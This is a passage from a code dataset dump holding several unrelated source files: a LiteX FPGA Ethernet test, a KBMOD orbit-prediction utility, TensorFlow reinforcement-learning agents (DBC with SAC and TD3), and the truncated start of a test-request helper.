main()\n\n","sub_path":"practice/pizza/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":7539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"644031701","text":"#!/usr/bin/env python3\n\nfrom migen import *\n\nfrom litex.soc.integration.soc_core import *\nfrom litex.soc.integration.builder import *\nfrom litex.soc.cores.clock import *\n\nfrom liteeth.phy.ecp5rgmii import LiteEthPHYRGMII\nfrom liteeth.core import LiteEthUDPIPCore\nfrom liteeth.frontend.etherbone import LiteEthEtherbone\n\nfrom litex_boards.platforms import colorlight_5a_75b\n\n# CRG ----------------------------------------------------------------------------------------------\n\nclass _CRG(Module):\n def __init__(self, platform, sys_clk_freq):\n self.clock_domains.cd_sys = ClockDomain()\n self.clock_domains.cd_sys_ps = ClockDomain()\n\n # # #\n\n clk25 = platform.request(\"clk25\")\n platform.add_period_constraint(clk25, 1e9/25e6)\n\n self.submodules.pll = pll = ECP5PLL()\n pll.register_clkin(clk25, 25e6)\n pll.create_clkout(self.cd_sys, sys_clk_freq)\n\n# RGMIITest ----------------------------------------------------------------------------------------\n\nclass RGMIITest(SoCMini):\n def __init__(self, platform, eth_phy=0, mac_address=0x10e2d5000000, ip_address=\"192.168.1.50\"):\n sys_clk_freq = int(133e6)\n\n # SoCMini ----------------------------------------------------------------------------------\n SoCMini.__init__(self, platform, sys_clk_freq)\n\n # CRG --------------------------------------------------------------------------------------\n self.submodules.crg = crg = _CRG(platform, sys_clk_freq)\n\n # 1 Gbps Ethernet --------------------------------------------------------------------------\n # phy\n ethphy = LiteEthPHYRGMII(\n clock_pads = platform.request(\"eth_clocks\", eth_phy),\n pads = platform.request(\"eth\", eth_phy))\n # core\n ethcore = LiteEthUDPIPCore(\n phy = ethphy,\n mac_address = mac_address,\n ip_address = ip_address,\n clk_freq = sys_clk_freq)\n self.submodules += ethphy, ethcore\n # timing constraints\n platform.add_period_constraint(ethphy.crg.cd_eth_rx.clk, 1e9/125e6)\n platform.add_false_path_constraints(crg.cd_sys.clk, ethphy.crg.cd_eth_rx.clk)\n\n # Led --------------------------------------------------------------------------------------\n counter = Signal(32)\n self.sync += counter.eq(counter + 1)\n self.comb += platform.request(\"user_led_n\").eq(counter[26])\n\n# Build --------------------------------------------------------------------------------------------\n\ndef main():\n platform = colorlight_5a_75b.Platform(revision=\"7.0\")\n soc = RGMIITest(platform)\n builder = Builder(soc, output_dir=\"build\")\n builder.build()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"5a-75b/rgmii_test.py","file_name":"rgmii_test.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"471029972","text":"from __future__ import print_function\n\nimport ephem\nimport os\nimport numpy as np\nimport pandas as pd\nimport astropy.units as u\nimport matplotlib.pyplot as plt\nfrom math import copysign\nfrom pyOrbfit.Orbit import Orbit\nfrom astropy.wcs import WCS\nfrom astropy.io import fits\nfrom astropy.time import Time\nfrom astropy.coordinates import SkyCoord\n\n\nclass ephem_utils(object):\n\n \"\"\"\n This class is designed to use the pyOrbfit python wrappers\n of the Bernstein and Khushalani (2000) orbit fitting code to\n predict orbits for search output from KBMOD.\n \"\"\"\n\n def __init__(self, results_filename, image_filename,\n visit_list, visit_mjd, results_visits, observatory):\n\n \"\"\"\n Read in the output from a KBMOD search and store as a pandas\n DataFrame.\n\n Take in a list of visits and times for those visits.\n\n Inputs\n ------\n results_filename: str\n The filename of the kbmod search results.\n\n image_filename: str\n The filename of the first image used in the kbmod search.\n\n visit_list: numpy array\n An array with all possible visit numbers in the search fields.\n\n visit_mjd: numpy array\n An array of the corresponding times in MJD for the visits listed\n in `visit_list`.\n\n results_visits: list\n A list of the visits actually searched by kbmod for the given\n results file.\n\n observatory: str\n The three character observatory code for the data searched.\n \"\"\"\n \n self.visit_df = pd.DataFrame(visit_list,\n columns=['visit_num'])\n self.visit_df['visit_mjd'] = visit_mjd\n\n results_array = np.genfromtxt(results_filename)\n\n # Only keep values and not property names from results file\n if len(np.shape(results_array)) == 1:\n results_proper = [results_array[1::2]]\n elif len(np.shape(results_array)) > 1:\n results_proper = results_array[:, 1::2]\n\n self.results_df = pd.DataFrame(results_proper,\n columns=['lh', 'flux', 'x0', 'y0',\n 'x_v', 'y_v', 'obs_count'])\n\n image_fits = fits.open(image_filename)\n self.wcs = WCS(image_fits[1].header)\n\n self.results_visits = results_visits\n\n self.results_mjd = self.visit_df[self.visit_df['visit_num'].isin(self.results_visits)]['visit_mjd'].values\n self.mjd_0 = self.results_mjd[0]\n\n self.obs = observatory\n\n def mpc_reader(self, filename):\n\n \"\"\"\n Read in a file with observations in MPC format and return the coordinates.\n\n Inputs\n ------\n filename: str\n The name of the file with the MPC-formatted observations.\n\n Returns\n -------\n c: astropy SkyCoord object\n A SkyCoord object with the ra, dec of the observations.\n \"\"\"\n iso_times = []\n time_frac = []\n ra = []\n dec = []\n\n with open(filename, 'r') as f:\n for line in f:\n year = str(line[15:19])\n month = str(line[20:22])\n day = str(line[23:25])\n iso_times.append(str('%s-%s-%s' % (year,month,day)))\n time_frac.append(str(line[25:31]))\n ra.append(str(line[32:44]))\n dec.append(str(line[44:56]))\n \n c = SkyCoord(ra, dec, unit=(u.hourangle, u.deg))\n\n return c\n\n def get_searched_radec(self, obj_idx):\n\n \"\"\"\n This will take an image and use its WCS to calculate the\n ra, dec locations of the object in the searched data.\n\n Inputs\n ------\n obj_idx: int\n The index of the object in the KBMOD results for which\n we want to calculate orbital elements/predictions.\n \"\"\"\n\n self.result = self.results_df.iloc[obj_idx]\n\n zero_times = self.results_mjd - self.mjd_0\n\n pix_coords_x = self.result['x0'] + \\\n self.result['x_v']*zero_times\n pix_coords_y = self.result['y0'] + \\\n self.result['y_v']*zero_times\n\n ra, dec = self.wcs.all_pix2world(pix_coords_x, pix_coords_y, 1)\n\n self.coords = SkyCoord(ra*u.deg, dec*u.deg)\n \n def format_results_mpc(self, file_out=None):\n\n \"\"\"\n This method will take in a row from the results file and output the\n astrometry of the object in the searched observations into a file with\n MPC formatting.\n\n Inputs\n ------\n file_out: str, default=None\n The output filename with the MPC-formatted observations\n of the KBMOD search result. If None, then it will save\n the output as 'kbmod_mpc.dat' and will be the default\n file in other methods below where file_in=None.\n \"\"\"\n\n field_times = Time(self.results_mjd, format='mjd')\n\n mpc_lines = []\n for t, c in zip(field_times, self.coords):\n mjd_frac = t.mjd % 1.0\n ra_hms = c.ra.hms\n dec_dms = c.dec.dms\n if dec_dms.d != 0:\n name = (\" c111112 c%4i %02i %08.5f %02i %02i %06.3f%+03i %02i %05.2f %s\" %\n (t.datetime.year, t.datetime.month, t.datetime.day+mjd_frac,\n ra_hms.h, ra_hms.m, ra_hms.s,\n dec_dms.d, np.abs(dec_dms.m), np.abs(dec_dms.s), self.obs))\n else:\n if copysign(1, dec_dms.d) == -1.0:\n dec_dms_d = '-00'\n else:\n dec_dms_d = '+00'\n name = (\" c111112 c%4i %02i %08.5f %02i %02i %06.3f%s %02i %05.2f %s\" %\n (t.datetime.year, t.datetime.month, t.datetime.day+mjd_frac,\n ra_hms.h, ra_hms.m, ra_hms.s,\n dec_dms_d, np.abs(dec_dms.m), np.abs(dec_dms.s), self.obs))\n\n print(name)\n mpc_lines.append(name)\n\n if file_out is None:\n file_out = 'kbmod_mpc.dat'\n\n with open(file_out, 'w') as f:\n for obs in mpc_lines:\n f.write(obs + '\\n')\n\n return\n\n def predict_ephemeris(self, date_range, file_in=None):\n\n \"\"\"\n Take in a time range before and after the initial observation of the object\n and predict the locations of the object along with the error parameters.\n\n Inputs\n ------\n date_range: numpy array\n The dates in MJD for predicted observations.\n\n file_in: str, default=None\n The MPC-formatted observations to use to fit the orbit and calculate\n predicted locations. If None, then by default will look for\n 'kbmod_mpc.dat'.\n\n Returns\n -------\n pred_ra: list\n A list of predicted ra coordinates in degrees.\n\n pred_dec: list\n A list of predicted dec coordinates in degrees.\n \"\"\"\n\n if file_in is None:\n file_in = 'kbmod_mpc.dat'\n o = Orbit(file=file_in)\n else:\n o = Orbit(file=file_in)\n self.coords = self.mpc_reader(file_in)\n\n pos_pred_list = []\n\n for d in date_range-15019.5: # Strange pyephem date conversion.\n date_start = ephem.date(d)\n pos_pred = o.predict_pos(date_start)\n pos_pred_list.append(pos_pred)\n\n pred_dec = []\n pred_ra = []\n\n for pp in pos_pred_list:\n pred_ra.append(np.degrees(pp['ra']))\n pred_dec.append(np.degrees(pp['dec']))\n\n return pred_ra, pred_dec\n\n def predict_elements(self, file_in=None):\n\n \"\"\"\n Predict the elements of the object\n\n Inputs\n ------\n file_in: str, default=None\n The MPC-formatted observations to use to fit the orbit and calculate\n predicted orbital elements and associated errors.\n If None, then by default will look for 'kbmod_mpc.dat'.\n\n Returns\n -------\n elements: dictionary\n A python dictionary with the orbital elements calculated from the\n Bernstein and Khushalani (2000) code.\n\n errs: dictionary\n A python dictionary with the calculated errors for the results in\n the `elements` dictionary.\n \"\"\"\n\n if file_in is None:\n file_in = 'kbmod_mpc.dat'\n o = Orbit(file=file_in)\n else:\n o = Orbit(file=file_in)\n self.coords = self.mpc_reader(file_in)\n\n elements, errs = o.get_elements()\n \n return elements, errs\n\n def predict_pixels(self, filename, obs_dates, file_in=None):\n\n \"\"\"\n Predict the pixels locations of the object in available data.\n\n Inputs\n ------\n filename: str\n The name of a processed image with a WCS that we can\n use to find the predicted pixel locations of the object.\n\n obs_dates: numpy array\n An array with times in MJD to predict the pixel locations\n of the object in the given image.\n\n file_in: str, default=None\n The MPC-formatted observations to use to fit the orbit and calculate\n predicted locations. If None, then by default will look for\n 'kbmod_mpc.dat'.\n\n Returns\n -------\n x_pix: numpy array\n A numpy array with the predicted x pixel locations of the object\n at the times from `obs_dates` in the given image.\n\n y_pix: numpy array\n A numpy array with the predicted y pixel locations of the object\n at the times from `obs_dates` in the given image.\n \"\"\"\n \n new_image = fits.open(filename)\n new_wcs = WCS(new_image[1].header)\n\n pred_ra, pred_dec = self.predict_ephemeris(obs_dates, \n file_in=file_in)\n\n x_pix, y_pix = new_wcs.all_world2pix(pred_ra, pred_dec, 1)\n\n return x_pix, y_pix\n\n def plot_predictions(self, date_range, file_in=None, include_obs=True):\n\n \"\"\"\n Take in results of B&K predictions along with errors and plot predicted path\n of objects.\n\n Inputs\n ------\n date_range: numpy array\n The dates in MJD for predicted observations.\n\n file_in: str, default=None\n The MPC-formatted observations to use to fit the orbit and calculate\n predicted locations. If None, then by default will look for\n 'kbmod_mpc.dat'.\n\n include_obs: boolean, default=True\n If true the plot will include the observations used in the\n KBMOD search.\n\n Returns\n -------\n fig: matplotlib figure\n Figure object with the predicted locations for the object in\n ra, dec space color-coded by time of observation.\n \"\"\"\n\n pred_ra, pred_dec = self.predict_ephemeris(date_range, \n file_in=file_in)\n\n fig = plt.figure()\n plt.scatter(pred_ra, pred_dec, c=date_range)\n cbar = plt.colorbar(label='mjd', orientation='horizontal',\n pad=0.15)\n if include_obs is True:\n plt.scatter(self.coords.ra.deg, self.coords.dec.deg, \n marker='+', s=296, edgecolors='r',\n #facecolors='none', \n label='Observed Points', lw=4)\n plt.legend()\n plt.xlabel('ra')\n plt.ylabel('dec')\n\n return fig\n","sub_path":"analysis/ephem_utils.py","file_name":"ephem_utils.py","file_ext":"py","file_size_in_byte":11711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"387120105","text":"#Learning Invariant Representations for Reinforcement Learning without Reconstruction, A. Zhang et al, 2020.\n\nimport tensorflow as tf\nimport numpy as np\n\nfrom Networks.Gaussian_Actor import Squashed_Gaussian_Actor\nfrom Networks.Basic_Networks import Q_network, Policy_network\nfrom Networks.Encoder import PixelEncoder\nfrom Networks.DBC_Networks import Reward_Network, Transition_Network\n\nfrom Common.Utils import copy_weight, soft_update\nfrom Common.Buffer import Buffer\n\nclass DBC_SACv2:\n def __init__(self, obs_dim, action_dim, args):\n\n self.buffer = Buffer(args.buffer_size)\n\n self.obs_dim = obs_dim\n self.action_dim = action_dim\n\n self.log_alpha = tf.Variable(initial_value=tf.math.log(args.alpha), trainable=True)\n self.target_entropy = -action_dim\n self.gamma = args.gamma\n self.bisim_coef = args.bisim_coef\n\n self.batch_size = args.batch_size\n self.feature_dim = args.feature_dim\n\n self.layer_num = args.layer_num\n self.filter_num = args.filter_num\n self.tau = args.tau\n self.encoder_tau = args.encoder_tau\n\n self.actor_update = args.actor_update\n self.critic_update = args.critic_update\n\n self.training_start = args.training_start\n self.train_alpha = args.train_alpha\n\n self.actor = Squashed_Gaussian_Actor(self.feature_dim, self.action_dim, args.hidden_dim, args.log_std_min, args.log_std_max)\n self.critic1 = Q_network(self.feature_dim, self.action_dim, args.hidden_dim)\n self.critic2 = Q_network(self.feature_dim, self.action_dim, args.hidden_dim)\n self.target_critic1 = Q_network(self.feature_dim, self.action_dim, args.hidden_dim)\n self.target_critic2 = Q_network(self.feature_dim, self.action_dim, args.hidden_dim)\n\n self.encoder = PixelEncoder(self.obs_dim, self.feature_dim, self.layer_num, self.filter_num)\n self.target_encoder = PixelEncoder(self.obs_dim, self.feature_dim, self.layer_num, self.filter_num)\n\n self.dynamics_model = Transition_Network(self.feature_dim, action_dim, deterministic=False)\n self.reward_model = Reward_Network(self.feature_dim)\n\n copy_weight(self.critic1, self.target_critic1)\n copy_weight(self.critic2, self.target_critic2)\n copy_weight(self.encoder, self.target_encoder)\n\n self.actor_optimizer = tf.keras.optimizers.Adam(args.actor_lr)\n self.critic1_optimizer = tf.keras.optimizers.Adam(args.critic_lr)\n self.critic2_optimizer = tf.keras.optimizers.Adam(args.critic_lr)\n\n self.encoder_optimizer = tf.keras.optimizers.Adam(args.encoder_lr)\n self.log_alpha_optimizer = tf.keras.optimizers.Adam(args.alpha_lr)\n\n self.dynamics_optimizer = tf.keras.optimizers.Adam(args.decoder_lr)\n self.reward_optimizer = tf.keras.optimizers.Adam(args.decoder_lr)\n\n self.current_step = 0\n\n self.name = 'DBC_SACv2'\n\n @property\n def alpha(self):\n return tf.exp(self.log_alpha)\n\n def get_action(self, obs):\n obs = np.expand_dims(np.array(obs), axis=0)\n feature = self.encoder(obs)\n action, _ = self.actor(feature)\n action = action.numpy()[0]\n\n return action\n\n def eval_action(self, obs):\n obs = np.expand_dims(np.array(obs), axis=0)\n feature = self.encoder(obs)\n action, _ = self.actor(feature, deterministic=True)\n action = action.numpy()[0]\n\n return action\n\n def train(self, local_step):\n self.current_step += 1\n total_a_loss = 0\n total_c1_loss, total_c2_loss = 0, 0\n total_alpha_loss = 0\n total_encoder_loss = 0\n total_dynamics_loss = 0\n total_reward_loss = 0\n loss_list = []\n s, a, r, ns, d = self.buffer.sample(self.batch_size)\n\n ns_action, ns_logpi = self.actor(self.encoder(ns))\n\n target_min_aq = tf.minimum(self.target_critic1(self.target_encoder(ns), ns_action),\n self.target_critic2(self.target_encoder(ns), ns_action))\n\n target_q = tf.stop_gradient(r + self.gamma * (1 - d) * (target_min_aq - self.alpha.numpy() * ns_logpi))\n\n with tf.GradientTape(persistent=True) as tape1:\n critic1_loss = tf.reduce_mean(tf.square(self.critic1(self.encoder(s), a) - target_q))\n critic2_loss = tf.reduce_mean(tf.square(self.critic2(self.encoder(s), a) - target_q))\n\n critic1_gradients = tape1.gradient(critic1_loss, self.encoder.trainable_variables + self.critic1.trainable_variables)\n self.critic1_optimizer.apply_gradients(zip(critic1_gradients, self.encoder.trainable_variables + self.critic1.trainable_variables))\n\n critic2_gradients = tape1.gradient(critic2_loss, self.encoder.trainable_variables + self.critic2.trainable_variables)\n self.critic2_optimizer.apply_gradients(zip(critic2_gradients, self.encoder.trainable_variables + self.critic2.trainable_variables))\n\n del tape1\n\n if self.current_step % self.actor_update == 0:\n with tf.GradientTape() as tape2:\n\n s_action, s_logpi = self.actor(tf.stop_gradient(self.encoder(s)))\n\n min_aq_rep = tf.minimum(self.critic1(tf.stop_gradient(self.encoder(s)), s_action),\n self.critic2(tf.stop_gradient(self.encoder(s)), s_action))\n\n actor_loss = tf.reduce_mean(self.alpha.numpy() * s_logpi - min_aq_rep)\n\n actor_gradients = tape2.gradient(actor_loss, self.actor.trainable_variables)\n self.actor_optimizer.apply_gradients(zip(actor_gradients, self.actor.trainable_variables))\n\n del tape2\n\n if self.train_alpha == True:\n with tf.GradientTape() as tape3:\n _, s_logpi = self.actor(self.encoder(s))\n alpha_loss = -(tf.exp(self.log_alpha) * tf.stop_gradient(s_logpi+ self.target_entropy))\n alpha_loss = tf.nn.compute_average_loss(alpha_loss)\n #alpha_loss = tf.reduce_mean(alpha_loss)\n\n log_alpha_gradients = tape3.gradient(alpha_loss, [self.log_alpha])\n self.log_alpha_optimizer.apply_gradients(zip(log_alpha_gradients, [self.log_alpha]))\n\n del tape3\n\n\n if self.current_step % self.critic_update == 0:\n soft_update(self.critic1, self.target_critic1, self.tau)\n soft_update(self.critic2, self.target_critic2, self.tau)\n soft_update(self.encoder, self.target_encoder, self.encoder_tau)\n\n #train encoder\n with tf.GradientTape() as tape4:\n new_ids = np.arange(len(s))\n np.random.shuffle(new_ids)\n s2 = tf.gather(s, new_ids)\n\n feature = self.encoder(s)\n #feature2 = tf.gather(feature, new_ids)\n feature2 = self.encoder(s2)\n\n reward = self.reward_model(tf.stop_gradient(feature))\n #reward2 = tf.gather(reward, new_ids)\n reward2 = self.reward_model(tf.stop_gradient(feature2))\n\n feature_action, _ = self.actor(tf.stop_gradient(feature), True)\n feature2_action, _ = self.actor(tf.stop_gradient(feature2), True)\n\n mu, sigma = self.dynamics_model(tf.concat([tf.stop_gradient(feature), feature_action], axis=1))\n mu2, sigma2 = self.dynamics_model(tf.concat([tf.stop_gradient(feature2), feature2_action], axis=1))\n\n z_dist = tf.reshape(tf.keras.losses.huber(feature, feature2), shape=tf.shape(feature))\n r_dist = tf.reshape(tf.keras.losses.huber(reward, reward2), shape=tf.shape(reward))\n transition_dist = tf.sqrt(tf.square(mu - mu2) + tf.square(sigma - sigma2))\n\n bisimilarity = r_dist + self.gamma * transition_dist\n encoder_loss = tf.reduce_mean(tf.square(z_dist - bisimilarity))\n\n encoder_gradients = tape4.gradient(encoder_loss, self.encoder.trainable_variables)\n self.encoder_optimizer.apply_gradients(zip(encoder_gradients, self.encoder.trainable_variables))\n\n #train dynamics\n with tf.GradientTape() as tape5:\n feature = self.encoder(s)\n mu, sigma = self.dynamics_model(tf.concat([feature, a], axis=1))\n\n if (sigma[0][0].numpy() == 0):\n if self.dynamics_model.deterministic == False:\n print(\"error\")\n sigma = tf.ones_like(mu)\n\n next_feature = self.encoder(ns)\n diff = (mu - tf.stop_gradient(next_feature)) / sigma\n\n dynamics_loss = tf.reduce_mean(0.5 * tf.square(diff) + tf.math.log(sigma))\n\n dynamics_gradients = tape5.gradient(dynamics_loss, self.encoder.trainable_variables + self.dynamics_model.trainable_variables)\n self.dynamics_optimizer.apply_gradients(zip(dynamics_gradients, self.encoder.trainable_variables + self.dynamics_model.trainable_variables))\n\n #train reward\n with tf.GradientTape() as tape6:\n feature = self.encoder(s)\n sample_dynamics = self.dynamics_model.sample(tf.concat([feature, a], axis=1))\n reward_prediction = self.reward_model(sample_dynamics)\n\n reward_loss = tf.reduce_mean(tf.square(reward_prediction - r))\n\n reward_gradients = tape6.gradient(reward_loss, self.encoder.trainable_variables + self.reward_model.trainable_variables)\n self.reward_optimizer.apply_gradients(zip(reward_gradients, self.encoder.trainable_variables + self.reward_model.trainable_variables))\n\n\n total_c1_loss += critic1_loss.numpy()\n total_c2_loss += critic2_loss.numpy()\n\n loss_list.append(['Loss/Critic1', total_c1_loss])\n loss_list.append(['Loss/Critic2', total_c2_loss])\n\n if self.current_step % self.actor_update == 0:\n total_a_loss += actor_loss.numpy()\n loss_list.append(['Loss/Actor', total_a_loss])\n\n total_encoder_loss += encoder_loss.numpy()\n loss_list.append(['Loss/Encoder', total_encoder_loss])\n\n total_dynamics_loss += dynamics_loss.numpy()\n loss_list.append(['Loss/Dynamics', total_dynamics_loss])\n\n total_reward_loss += reward_loss.numpy()\n loss_list.append(['Loss/Reward', total_reward_loss])\n\n if self.current_step % self.actor_update == 0 and self.train_alpha == True:\n total_alpha_loss += alpha_loss.numpy()\n loss_list.append(['Loss/Alpha', total_alpha_loss])\n\n loss_list.append(['Alpha', tf.exp(self.log_alpha).numpy()])\n\n return loss_list\n\n\n\n\n\nclass DBC_TD3:\n def __init__(self, obs_dim, action_dim, hidden_dim=512, gamma=0.99, learning_rate=0.001, batch_size=512, policy_delay=2, actor_noise=0.1, target_noise=0.2, noise_clip=0.5, buffer_size=1e6,\n feature_dim=50, layer_num=4, filter_num=32, tau=0.005, encoder_tau=0.005, bisim_coef = 0.5, training_start=1000):\n\n self.buffer = Buffer(buffer_size)\n\n self.obs_dim = obs_dim\n self.action_dim = action_dim\n\n self.hidden_dim = hidden_dim\n self.gamma = gamma\n self.learning_rate = learning_rate\n\n self.batch_size = batch_size\n self.feature_dim = feature_dim\n\n self.layer_num = layer_num\n self.filter_num = filter_num\n self.tau = tau\n self.encoder_tau = encoder_tau\n self.bisim_coef = bisim_coef\n\n self.policy_delay = policy_delay\n self.actor_noise = actor_noise\n self.target_noise = target_noise\n self.noise_clip = noise_clip\n\n self.training_start = training_start\n\n self.actor = Policy_network(feature_dim, action_dim, (hidden_dim, hidden_dim))\n self.target_actor = Policy_network(feature_dim, action_dim, (hidden_dim, hidden_dim))\n self.critic1 = Q_network(feature_dim, action_dim, (hidden_dim, hidden_dim))\n self.critic2 = Q_network(feature_dim, action_dim, (hidden_dim, hidden_dim))\n self.target_critic1 = Q_network(feature_dim, action_dim, (hidden_dim, hidden_dim))\n self.target_critic2 = Q_network(feature_dim, action_dim, (hidden_dim, hidden_dim))\n\n self.encoder = PixelEncoder(self.obs_dim, feature_dim, layer_num, filter_num)\n self.target_encoder = PixelEncoder(self.obs_dim, feature_dim, layer_num, filter_num)\n\n self.dynamics_model = Transition_Network(feature_dim, action_dim)\n self.reward_model = Reward_Network(feature_dim)\n\n copy_weight(self.actor, self.target_actor)\n copy_weight(self.critic1, self.target_critic1)\n copy_weight(self.critic2, self.target_critic2)\n copy_weight(self.encoder, self.target_encoder)\n\n self.actor_optimizer = tf.keras.optimizers.Adam(learning_rate)\n self.critic1_optimizer = tf.keras.optimizers.Adam(learning_rate)\n self.critic2_optimizer = tf.keras.optimizers.Adam(learning_rate)\n\n self.encoder_optimizer = tf.keras.optimizers.Adam(learning_rate)\n self.dynamics_optimizer = tf.keras.optimizers.Adam(learning_rate)\n self.reward_optimizer = tf.keras.optimizers.Adam(learning_rate)\n\n self.name = 'DBC_TD3'\n\n def get_action(self, obs):\n obs = np.expand_dims(np.array(obs), axis=0)\n feature = self.encoder(obs)\n action = self.actor(feature).numpy()[0]\n\n return action\n\n def train(self, local_step):#critic -> transition -> reward -> encoder -> actor\n set1, set2 = self.buffer.dbc_sample(self.batch_size)\n\n s, a, r, ns, d = set1\n s2, a2, r2, ns2, d2 = set2\n\n target_action = tf.clip_by_value(self.target_actor(self.target_encoder(ns)) + tf.clip_by_value(\n tf.random.normal(shape=self.target_actor(self.target_encoder(ns)).shape, mean=0, stddev=self.target_noise), -self.noise_clip,\n self.noise_clip), -1, 1)\n\n target_value = tf.stop_gradient(\n r + self.gamma * (1 - d) * tf.minimum(self.target_critic1(self.target_encoder(ns), target_action),\n self.target_critic2(self.target_encoder(ns), target_action)))\n\n with tf.GradientTape(persistent=True) as tape1:\n critic1_loss = 0.5 * tf.reduce_mean(tf.square(target_value - self.critic1(self.encoder(s), a)))\n critic2_loss = 0.5 * tf.reduce_mean(tf.square(target_value - self.critic2(self.encoder(s), a)))\n\n critic1_grad = tape1.gradient(critic1_loss, self.encoder.trainable_variables + self.critic1.trainable_variables)\n self.critic1_optimizer.apply_gradients(zip(critic1_grad, self.encoder.trainable_variables + self.critic1.trainable_variables))\n\n critic2_grad = tape1.gradient(critic2_loss, self.encoder.trainable_variables + self.critic2.trainable_variables)\n self.critic2_optimizer.apply_gradients(zip(critic2_grad, self.encoder.trainable_variables + self.critic2.trainable_variables))\n\n del tape1\n\n #train dynamics\n with tf.GradientTape() as tape2:\n feature = self.encoder(s)\n next_feature = self.encoder(ns)\n mu, sigma = self.dynamics_model(tf.concat([feature, a], axis=1))\n\n if (sigma[0][0].numpy() == 0):\n sigma = tf.ones_like(mu)\n diff = (mu - tf.stop_gradient(next_feature))/sigma\n dynamics_loss = tf.reduce_mean(0.5 * tf.square(diff) + tf.math.log(sigma))\n\n dynamics_gradients = tape2.gradient(dynamics_loss, self.encoder.trainable_variables + self.dynamics_model.trainable_variables)\n self.dynamics_optimizer.apply_gradients(zip(dynamics_gradients, self.encoder.trainable_variables + self.dynamics_model.trainable_variables))\n\n #dynamics_gradients = tape2.gradient(dynamics_loss, self.dynamics_model.trainable_variables)\n #self.dynamics_optimizer.apply_gradients(zip(dynamics_gradients, self.dynamics_model.trainable_variables))\n\n del tape2\n\n #train reward\n with tf.GradientTape() as tape3:\n feature = self.encoder(s)\n sample_dynamics = self.dynamics_model.sample(tf.concat([feature, a], axis=1))\n reward_prediction = self.reward_model(sample_dynamics)\n\n reward_loss = tf.reduce_mean(tf.square(reward_prediction - (r)))\n\n reward_gradients = tape3.gradient(reward_loss, self.encoder.trainable_variables + self.reward_model.trainable_variables)\n self.reward_optimizer.apply_gradients(zip(reward_gradients, self.encoder.trainable_variables + self.reward_model.trainable_variables))\n\n #reward_gradients = tape3.gradient(reward_loss, self.reward_model.trainable_variables)\n #self.reward_optimizer.apply_gradients(zip(reward_gradients, self.reward_model.trainable_variables))\n\n del tape3\n\n #train encoder\n with tf.GradientTape() as tape4:\n feature1 = self.encoder(s)\n feature2 = self.encoder(s2)\n\n mu1, sigma1 = self.dynamics_model(tf.concat([feature1, a], axis=1))\n mu2, sigma2 = self.dynamics_model(tf.concat([feature2, a2], axis=1))\n\n z_dist = tf.abs(feature1 - feature2)\n r_dist = tf.abs(r - r2)\n\n transition_dist = tf.sqrt(tf.square(tf.abs(mu1 - mu2)) + tf.square(tf.abs(sigma1 - sigma2)))\n bisimilarity = tf.stop_gradient(tf.cast(r_dist, tf.float32) + self.gamma * tf.cast(transition_dist, tf.float32))\n encoder_loss = self.bisim_coef * tf.reduce_mean(tf.square(z_dist - bisimilarity))\n\n encoder_gradients = tape4.gradient(encoder_loss, self.encoder.trainable_variables)\n self.encoder_optimizer.apply_gradients(zip(encoder_gradients, self.encoder.trainable_variables))\n\n del tape4\n\n if local_step % (self.policy_delay) == 0:\n with tf.GradientTape() as tape5:\n actor_loss = -tf.reduce_mean(self.critic1(tf.stop_gradient(self.encoder(s)), self.actor(tf.stop_gradient(self.encoder(s)))))\n\n actor_grad = tape5.gradient(actor_loss, self.actor.trainable_variables)\n self.actor_optimizer.apply_gradients(zip(actor_grad, self.actor.trainable_variables))\n\n del tape5\n\n soft_update(self.actor, self.target_actor, self.tau)\n soft_update(self.critic1, self.target_critic1, self.tau)\n soft_update(self.critic2, self.target_critic2, self.tau)\n soft_update(self.encoder, self.target_encoder, self.encoder_tau)\n\n\n\n\n\n\n\n","sub_path":"Algorithms/ImageRL/DBC.py","file_name":"DBC.py","file_ext":"py","file_size_in_byte":18257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"626737396","text":"# -*- coding:utf-8 -*-\nimport inspect\nimport urllib\nimport urlparse\nimport re\nimport json\nimport copy\n\nfrom common.exceptions import BorrowerResponseException, LenderResponseException\nfrom common.global_config import Global\nfrom common.lib.json_handler import handle_item_in_json\nfrom common.service_helper import ServiceHelperSingleton\nfrom common.utility import Utility\n\n\ndef retrieve_value_from_dict(target_key, target_dict):\n \"\"\"\n retrieve value from dict whose keys may be tuple and input target_key is in the tuple.\n \"\"\"\n for key in target_dict.keys():\n\n if isinstance(key, tuple):\n if target_key in key:\n return target_dict[key]\n elif target_key == key:\n return target_dict[target_key]\n\n\ndef set_request_data_from_args(func):\n def wrapper(entity, *args, **kwargs):\n if not entity._data and entity._has_data_pattern:\n function_inspect = inspect.getargspec(entity._set_data_pattern)\n\n if len(function_inspect.args) <= 1 and \\\n function_inspect.varargs is None and function_inspect.keywords is None:\n entity._set_data_pattern()\n else:\n args, kwargs = entity._set_data_pattern(*args, **kwargs) or (\n args, kwargs)\n\n data_pattern = entity.current_data_pattern\n encode_str = lambda x: (type(x) == unicode) and \\\n unicode(x).encode('utf-8') or str(x)\n if data_pattern:\n data = ''\n\n def handle_str_fake(data):\n find_fake_phrases_pattern = r'fake(?:_en|_cn)?.\\w*'\n find_only_fake_pattern = r'^fake(?:_en|_cn)?.'\n if re.search(find_fake_phrases_pattern, data):\n phrases = re.findall(find_fake_phrases_pattern, data)\n for fake_item in phrases:\n fake_object = getattr(entity.utility,\n re.search(\n r\"^fake(?:_en|_cn)?\",\n fake_item).group())\n\n fake_attribute = re.sub(find_only_fake_pattern, '',\n fake_item)\n faked_value = getattr(fake_object, fake_attribute)()\n data = re.sub(find_fake_phrases_pattern,\n encode_str(faked_value),\n encode_str(data), 1)\n return data\n\n def handle_str_data_patten():\n def prepare_url_dict(l_arg):\n rt_dict = {}\n keys = [t_items[0] for t_items in l_arg]\n values = [unicode(t_items[1]).encode('utf-8') for\n t_items in l_arg]\n for item in keys:\n index_num = keys.index(item)\n temp_count = keys.count(item)\n if temp_count > 1:\n temp_l = tuple(\n [i for i in\n values[index_num:index_num + temp_count]])\n rt_dict.update({item: temp_l})\n else:\n rt_dict.update({item: values[index_num]})\n return rt_dict\n\n if args:\n parsed_data_pattern = urlparse.parse_qsl(data_pattern)\n number_of_args_difference = len(\n 